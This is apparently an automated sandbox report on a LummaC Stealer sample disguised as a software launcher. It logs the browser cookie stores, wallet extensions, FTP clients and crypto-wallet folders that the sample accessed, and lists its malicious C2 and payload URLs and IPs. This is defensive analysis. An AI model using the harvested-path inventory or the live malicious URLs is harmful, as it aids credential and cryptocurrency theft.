Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents\JDDHMPCDUJ	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents\JDDHMPCDUJ	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents\QCOILOQIKC	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents\QCOILOQIKC	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents\JDDHMPCDUJ	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents\JDDHMPCDUJ	Jump to behavior

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: 0000000E.00000002.1404835461.00000000039C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 7592, type: MEMORYSTR
Source: Yara match	File source: 14.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.1398137512.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	Valid Accounts	12 Windows Management Instrumentation	111 Scripting	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	2 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	12 Native API	1 DLL Side-Loading	1 Access Token Manipulation	3 Obfuscated Files or Information	LSASS Memory	12 File and Directory Discovery	Remote Desktop Protocol	31 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Exploitation for Client Execution	1 Registry Run Keys / Startup Folder	211 Process Injection	1 Software Packing	Security Account Manager	36 System Information Discovery	SMB/Windows Admin Shares	1 Screen Capture	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 Command and Scripting Interpreter	Login Hook	1 Registry Run Keys / Startup Folder	1 Timestomp	NTDS	231 Security Software Discovery	Distributed Component Object Model	2 Clipboard Data	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	2 PowerShell	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	231 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	231 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	211 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
IMSoftware{Launcher}3.21.exe	55%	Virustotal		Browse
IMSoftware{Launcher}3.21.exe	53%	ReversingLabs	Win64.Spyware.Lummastealer
SAMPLE	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://changeaie.top:443/gepst	100%	Avira URL Cloud	malware
https://changeaie.top:443/geps2o	100%	Avira URL Cloud	malware
https://changeaie.top/	100%	Avira URL Cloud	malware
https://changeaie.top/gepsw=	100%	Avira URL Cloud	malware
https://changeaie.top/gepsA	100%	Avira URL Cloud	malware
https://changeaie.top:443/geps	100%	Avira URL Cloud	malware
http://62.60.226.112/public_files/fafhAeI.txt	100%	Avira URL Cloud	phishing
https://changeaie.top/8	100%	Avira URL Cloud	malware
https://ofice365.github.io/1/test.jpg09	100%	Avira URL Cloud	malware
https://changeaie.top/gepse	100%	Avira URL Cloud	malware
https://changeaie.top/geps	100%	Avira URL Cloud	malware
https://changeaie.top/kn	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com	217.20.55.21	true	false	high
ofice365.github.io	185.199.108.153	true	false	high
pki-goog.l.google.com	142.251.15.94	true	false	high
changeaie.top	104.21.42.7	true	false	high
soursopsf.run	unknown	unknown	false	high
xcelmodo.run	unknown	unknown	true	unknown
c.pki.goog	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
liftally.top/xasj	false		high
https://ofice365.github.io/1/test.jpg	false		high
soursopsf.run/gsoiao	false		high
salaccgfa.top/gsooz	false		high
upmodini.digital/gokk	false		high
http://c.pki.goog/r/r4.crl	false		high
changeaie.top/geps	false		high
http://62.60.226.112/public_files/fafhAeI.txt	false	Avira URL Cloud: phishing	unknown
xcelmodo.run/nahd	false		high
https://changeaie.top/geps	true	Avira URL Cloud: malware	unknown
http://c.pki.goog/r/gsr1.crl	false		high
easyupgw.live/eosz	false		high
zestmodp.top/zeda	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://bitbucket.org/fsdfsdfs/fsdfdsfsdfsdf/downloads/test2.jpg?13711309	powershell.exe, 00000006.00000002.1290266831.0000015EB11E8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://changeaie.top/gepsA	MSBuild.exe, 0000000E.00000002.1403926278.0000000001672000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ofice365.github.io	powershell.exe, 00000006.00000002.1290266831.0000015EB11E8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000006.00000002.1290266831.0000015EB11E8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://changeaie.top:443/geps2o	MSBuild.exe, 0000000E.00000002.1400725047.00000000015D3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://changeaie.top:443/gepst	MSBuild.exe, 0000000E.00000002.1400725047.00000000015D3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000006.00000002.1290266831.0000015EB11E8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://changeaie.top/gepsw=	MSBuild.exe, 0000000E.00000002.1400725047.00000000015C8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crl.ver)	svchost.exe, 00000007.00000002.2394642232.000001FDC9C0E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/ProdV2.C:	edb.log.7.dr	false		high
https://changeaie.top:443/geps	MSBuild.exe, 0000000E.00000002.1400725047.00000000015D3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ofice365.github.io/1/test.jpg09	powershell.exe, 00000006.00000002.1290266831.0000015EB11E8000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://aka.ms/pscore6	powershell.exe, 00000004.00000002.1580076840.0000026425B0F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://changeaie.top/	MSBuild.exe, 0000000E.00000002.1401843157.00000000015F8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://github.com/Pester/Pester	powershell.exe, 00000006.00000002.1290266831.0000015EB11E8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/Prod.C:	edb.log.7.dr	false		high
https://g.live.com/odclientsettings/ProdV2	edb.log.7.dr	false		high
https://changeaie.top/8	MSBuild.exe, 0000000E.00000002.1401843157.00000000015F8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96	svchost.exe, 00000007.00000003.1203426927.000001FDC9C02000.00000004.00000800.00020000.00000000.sdmp, edb.log.7.dr	false		high
https://changeaie.top/gepse	MSBuild.exe, 0000000E.00000002.1400725047.00000000015C8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://aka.ms/pscore68	powershell.exe, 00000004.00000002.1580076840.0000026425B28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1290266831.0000015EB0FC1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://changeaie.top/kn	MSBuild.exe, 0000000E.00000002.1401843157.00000000015F8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000004.00000002.1580076840.0000026425B58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1290266831.0000015EB0FC1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6	svchost.exe, 00000007.00000003.1203426927.000001FDC9C02000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.42.7	changeaie.top	United States	13335	CLOUDFLARENETUS	false
62.60.226.112	unknown	Iran (ISLAMIC Republic Of)	18013	ASLINE-AS-APASLINELIMITEDHK	false
185.199.108.153	ofice365.github.io	Netherlands	54113	FASTLYUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1663633
Start date and time:	2025-04-12 02:07:45 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 30s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	IMSoftware{Launcher}3.21.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@17/12@5/4
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 96% Number of executed functions: 56 Number of non-executed functions: 87
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 184.28.213.193, 199.232.210.172, 23.198.74.242, 217.20.55.21, 20.109.210.53, 20.3.187.198, 52.149.20.212, 20.242.39.171
Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, slscr.update.microsoft.com, e3913.cd.akamaiedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, fe3cr.delivery.mp.microsoft.com, cac-ocsp.digicert.com.edgekey.net, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
Execution Graph export aborted for target powershell.exe, PID 1432 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
20:08:43	API Interceptor	41x Sleep call for process: powershell.exe modified
20:08:44	API Interceptor	2x Sleep call for process: svchost.exe modified
20:08:55	API Interceptor	6x Sleep call for process: MSBuild.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.42.7	nper1lu.exe	Get hash	malicious	LummaC Stealer	Browse
104.21.42.7	launcher.exe	Get hash	malicious	DarkTortilla, LummaC Stealer	Browse
62.60.226.112	file.exe	Get hash	malicious	LummaC Stealer	Browse	62.60.226.112/public_files/mkAmkbg.txt
	MCxU5Fj.exe	Get hash	malicious	LummaC Stealer	Browse	62.60.226.112/public_files/ajgoFab.txt
	soft.exe	Get hash	malicious	GCleaner, LummaC Stealer, Socks5Systemz	Browse	62.60.226.112/public_files/hkkcrng.txt
	foUENR5vt.exe	Get hash	malicious	LummaC Stealer	Browse	62.60.226.112/public_files/hkkcrng.txt
	67c2163c9db39.vbs	Get hash	malicious	LummaC Stealer	Browse	62.60.226.112/public_files/hkkcrng.txt
185.199.108.153	http://learn-docs-trazure.github.io/	Get hash	malicious	Unknown	Browse	learn-docs-trazure.github.io/
	http://ojasm777.github.io/Netflix-Clone/	Get hash	malicious	HTMLPhisher	Browse	ojasm777.github.io/Netflix-Clone/
	http://saiamareswar.github.io/Netflix_clone/	Get hash	malicious	HTMLPhisher	Browse	saiamareswar.github.io/Netflix_clone/
	http://subashinib181203.github.io/NetflixBI/	Get hash	malicious	HTMLPhisher	Browse	subashinib181203.github.io/NetflixBI/
	http://josecedrim.github.io/Clone-Netflix-2/	Get hash	malicious	HTMLPhisher	Browse	josecedrim.github.io/Clone-Netflix-2/
	http://raushan12122002.github.io/Netflix-Clone/	Get hash	malicious	HTMLPhisher	Browse	raushan12122002.github.io/Netflix-Clone/
	http://modelecasting.github.io/clone/	Get hash	malicious	HTMLPhisher	Browse	modelecasting.github.io/clone/
	http://mushraf-coder.github.io/Netlix-Clone/	Get hash	malicious	HTMLPhisher	Browse	mushraf-coder.github.io/Netlix-Clone/
	QUOTATION.exe	Get hash	malicious	FormBook	Browse	www.haoyun.website/a03d/?AnB=N0GdYZvxrX&DzuDf=M9yuS0Q/zm5t8U3StSAeK3d/0GWzO6hCIAE2yJAL2S9lxfaLnLN+cxCn4w5VnMDnOyospllN9g==
	http://manoj-madavarapu.github.io/Netflix-clone/	Get hash	malicious	HTMLPhisher	Browse	manoj-madavarapu.github.io/Netflix-clone/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ofice365.github.io	Purchase Inquiry # 74713.vbs	Get hash	malicious	FormBook	Browse	185.199.108.153
	AVCXw0587P.exe	Get hash	malicious	Amadey, Babadeda, Batch Injector	Browse	185.199.110.153
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.199.108.153
	m5Pok55RGl.exe	Get hash	malicious	Unknown	Browse	185.199.108.153
	Lead.Upload.Report.Feb.2025.exe	Get hash	malicious	Unknown	Browse	185.199.108.153
	MCxU5Fj.exe	Get hash	malicious	LummaC Stealer	Browse	185.199.108.153
	soft.exe	Get hash	malicious	GCleaner, LummaC Stealer, Socks5Systemz	Browse	185.199.108.153
	foUENR5vt.exe	Get hash	malicious	LummaC Stealer	Browse	185.199.108.153
	67c2163c9db39.vbs	Get hash	malicious	LummaC Stealer	Browse	185.199.108.153
	SecuriteInfo.com.Win64.Malware-gen.9554.4888.exe	Get hash	malicious	LummaC Stealer	Browse	185.199.108.153
pki-goog.l.google.com	SoftWare(2).exe	Get hash	malicious	LummaC Stealer	Browse	74.125.21.94
	SoftWare(1).exe	Get hash	malicious	LummaC Stealer	Browse	74.125.21.94
	Launcher.exe	Get hash	malicious	LummaC Stealer	Browse	173.194.219.94
	launch3r-v2.2.2.exe	Get hash	malicious	LummaC Stealer	Browse	142.250.9.94
	SecuriteInfo.com.Win32.MalwareX-gen.26952.14499.exe	Get hash	malicious	Unknown	Browse	74.125.136.94
	SecuriteInfo.com.Win32.MalwareX-gen.29703.7480.exe	Get hash	malicious	Unknown	Browse	173.194.219.94
	https://serverlink2.voicenoteserver.com/b2104997593043ed9e6804085b8d628e/?	Get hash	malicious	HTMLPhisher	Browse	172.217.215.94
	http://cliffordchance.life	Get hash	malicious	Unknown	Browse	108.177.122.94
	Potassium.exe	Get hash	malicious	Unknown	Browse	142.250.9.94
